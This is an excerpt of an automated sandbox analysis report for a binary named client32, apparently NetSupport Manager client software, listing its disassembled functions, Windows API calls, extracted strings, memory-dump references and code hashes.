Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

..\ctl32\listview.cpp, xrefs: 110A9BDE
..\ctl32\liststat.cpp, xrefs: 1101505E
m_hWnd, xrefs: 11015063, 110A9BE3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: c436e947d2848deec0fb9928a336379f0adbf8865378183fedf00189e60001fd
Instruction ID: d81ebb055fda58700f75f79f26636c29c16c7b22a0f55796a7f026fcc49370bb
Opcode Fuzzy Hash: c436e947d2848deec0fb9928a336379f0adbf8865378183fedf00189e60001fd
Instruction Fuzzy Hash: E1F0B439F80325AFE321D691EC41FC5B2D49B05719F144459F2866B2D0E6E4F4C0C7D1

Function 110ED440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000000E), ref: 110ED452
GetDeviceCaps.GDI32(?,0000000C), ref: 110ED459

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

nColors, xrefs: 110ED475
..\CTL32\pcibmp.cpp, xrefs: 110ED470

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
String ID: ..\CTL32\pcibmp.cpp$nColors
API String ID: 2713834284-4292231205
Opcode ID: 445b5cdeb2f657be81a6bcd708cf8395f17231805891ee6b04c4cf4b89d31dad
Instruction ID: c4e99504f66d7940fb68d678be2a600ae47f4e549cf576f0102eeefa5098aa59
Opcode Fuzzy Hash: 445b5cdeb2f657be81a6bcd708cf8395f17231805891ee6b04c4cf4b89d31dad
Instruction Fuzzy Hash: 94E01226B4127937E511659AAC81F8AAA9C9B856A8F014122FA04BB281D5916C0086D1

Function 1101D080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D0AB
EnableWindow.USER32(00000000,?), ref: 1101D0B6

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 1101D096
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D091

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 778c2b94e077e4827911f5eee8574bf79009bbb7e048fc771d266692fa6a02c4
Instruction ID: 439a9ddf82530156371757c1ad27fa7d45e96fa67b4cc0a563f24a8ab3e01a3d
Opcode Fuzzy Hash: 778c2b94e077e4827911f5eee8574bf79009bbb7e048fc771d266692fa6a02c4
Instruction Fuzzy Hash: 80E08676A10329BFD310EAA1DC44F9BF7ACEB45365F00C529FA6587600D675E840C7A1

Function 1101D0D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D0FF
ShowWindow.USER32(00000000), ref: 1101D106

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 1101D0E6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D0E1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: b5d2a128ff6837b44cdf2140aeb335d361716e7f34d9420fa282e33fb6e07c46
Instruction ID: a753bf33bc507b69dd8188ad1449bb8027ad46a5f8f6d6b92600deb56285dd08
Opcode Fuzzy Hash: b5d2a128ff6837b44cdf2140aeb335d361716e7f34d9420fa282e33fb6e07c46
Instruction Fuzzy Hash: FEE04F7991032AAFC311EA61DC89F9BB7ACEB45264F10852AFA2947200DA74E84087A1

Function 1108D4A0 Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 1106D080: EnterCriticalSection.KERNEL32(?,33E68B52,?,76937CB0,76937AA0), ref: 1106D102
Part of subcall function 1106D080: SetEvent.KERNEL32(?,?,00000000,1106AF70,?,?), ref: 1106D1E2

CloseHandle.KERNEL32(00000000,00000001,000000C2,?,00000001,000000C1,?,00000001,000000C0,?,00000001,00000093,?,00000001,00000091,?), ref: 1108D62A
_free.LIBCMT ref: 1108D64B
CloseHandle.KERNEL32(?), ref: 1108D686
FreeLibrary.KERNEL32(?), ref: 1108D6A6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalEnterEventFreeLibrarySection_free
String ID:
API String ID: 3241181375-0
Opcode ID: 334033570ceca361396b438f341e0cb5bb9457b056a738265af3a9d3fe2527bc
Instruction ID: 4b30d61724e5689d49fdceb45feeff28ceccc7da9815afef243e98bfd4825fe5
Opcode Fuzzy Hash: 334033570ceca361396b438f341e0cb5bb9457b056a738265af3a9d3fe2527bc
Instruction Fuzzy Hash: 4C51C1B4B853067AFD25A6214CD6FBE214E8B94BCCF040118F7956E1C2CED67D83A326

Function 11067020 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 110670CA
LeaveCriticalSection.KERNEL32(?), ref: 11067190

Part of subcall function 1110C300: InterlockedDecrement.KERNEL32(?), ref: 1110C308

Strings

EnumConn error, idata=%x, xrefs: 11067206

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$DecrementEnterInterlockedLeave
String ID: EnumConn error, idata=%x
API String ID: 1807080765-705201588
Opcode ID: bc2e373e2124ef9bbaee3fd086104ac4477b3b68e1abedb8ecefb27c663a5ebc
Instruction ID: 5ab1c34b1a7a926f6d5ed1f611dbd10fe7b4918518b7024ffedcbdc9c0f83b5b
Opcode Fuzzy Hash: bc2e373e2124ef9bbaee3fd086104ac4477b3b68e1abedb8ecefb27c663a5ebc
Instruction Fuzzy Hash: 28517E75E00B46CBEB25CF59C480BAAB7F9FF44318F104AAED8568BB41E731A845CB51

Function 110350E0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

std::exception::exception.LIBCMT ref: 110351B7
__CxxThrowException@8.LIBCMT ref: 110351CC
std::exception::exception.LIBCMT ref: 110351DB
__CxxThrowException@8.LIBCMT ref: 110351F0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
String ID:
API String ID: 1651403513-0
Opcode ID: 3e11b2e74676264bac625771c9ea56acfed373f3234b0be9b7f5429c70282ebf
Instruction ID: 27551bf16af5aeccb10e7826950cd04597747518e1c60015d935e9be433b6743
Opcode Fuzzy Hash: 3e11b2e74676264bac625771c9ea56acfed373f3234b0be9b7f5429c70282ebf
Instruction Fuzzy Hash: B7413BB6D00605AFCB10CF9AD880AAEFBF8FFA8604F10855FE555A7210E775A604CF91

Function 110A70C0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A70E9
CreateRectRgn.GDI32(?,110A81B7,?,?), ref: 110A714B
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7158
DeleteObject.GDI32(00000000), ref: 110A715F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateRect$CombineDeleteObject
String ID:
API String ID: 1735589438-0
Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
Instruction ID: f65916cfaa93ffb0fd59208f96c5694728e7e0d2e2e3f92bab711c1a6bf64a6f
Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
Instruction Fuzzy Hash: B5219535A00115ABCB04DBA9D884CBFB7BAFFC97107118159F946D3254E6309D82D7A0

Function 110CD100 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 110CC870: EnterCriticalSection.KERNEL32(00000000,00000000,33E68B52,00000000,00000000,1112A989,110CCAF0,?,00000001), ref: 110CC8AA
Part of subcall function 110CC870: LeaveCriticalSection.KERNEL32(00000000), ref: 110CC912

IsWindow.USER32(?), ref: 110CD15B

Part of subcall function 110CAE60: GetCurrentThreadId.KERNEL32 ref: 110CAE69

RemovePropA.USER32(?), ref: 110CD188
DeleteObject.GDI32(?), ref: 110CD19C
DeleteObject.GDI32(?), ref: 110CD1A6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 3515130325-0
Opcode ID: 46033b57bf639eea3cd9ed38a1c16d3558fbd0589452317d10e1d71273b58253
Instruction ID: 1c6622a748d39fdb4262bd57cd097bd54826a8b02c52af31ca45ab1e1736de8c
Opcode Fuzzy Hash: 46033b57bf639eea3cd9ed38a1c16d3558fbd0589452317d10e1d71273b58253
Instruction Fuzzy Hash: 3A217CB1E00715ABDB20DF69C840B5FFBE8EB44B18F004A6EE86293680D775E400CB91

Function 110635D0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

FindWindowA.USER32(?,00000000), ref: 110635EE

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 67625af9ef427f126eaaa19eee18271360e216875c09203b5f02470f08078770
Instruction ID: 3dfe66363058c9bfecd5972d85aac8b65f3b14315a6543d37988fa572b57e471
Opcode Fuzzy Hash: 67625af9ef427f126eaaa19eee18271360e216875c09203b5f02470f08078770
Instruction Fuzzy Hash: AE21A675E4122D9BD750CF58E885BDEF7B4EF49314F1081AAEA099B281DA30AE44CBD0

Function 1103D000 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E8454), ref: 1103D031

Strings

/weblock.htm, xrefs: 1103D09D
redirect:http://127.0.0.1, xrefs: 1103D07D
:%u, xrefs: 1103D08F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
API String ID: 3472027048-2181447511
Opcode ID: 093620b9e6204ff284702fb2b4b85a75b2fa0a570d981542f5a30dc90b8a859a
Instruction ID: 21be2a4b8032406d2ea18ae0cb8702588b0b9a72b53f921a10b0da300665c8c6
Opcode Fuzzy Hash: 093620b9e6204ff284702fb2b4b85a75b2fa0a570d981542f5a30dc90b8a859a
Instruction Fuzzy Hash: 7E110831E0111ADFFB50DBA4DC80FFEFBA89B40708F0041A9F81E9B180DA257D058BA2

Function 11131490 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

